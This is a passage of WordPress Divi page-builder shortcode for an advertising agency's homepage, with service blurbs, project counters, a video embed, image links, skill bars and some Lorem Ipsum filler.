use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/434x434.jpg\" title_text=\"434x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"12px||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x217.jpg\" title_text=\"217x217\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x217...2-1.jpg\" title_text=\"217x217...2 (1)\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" 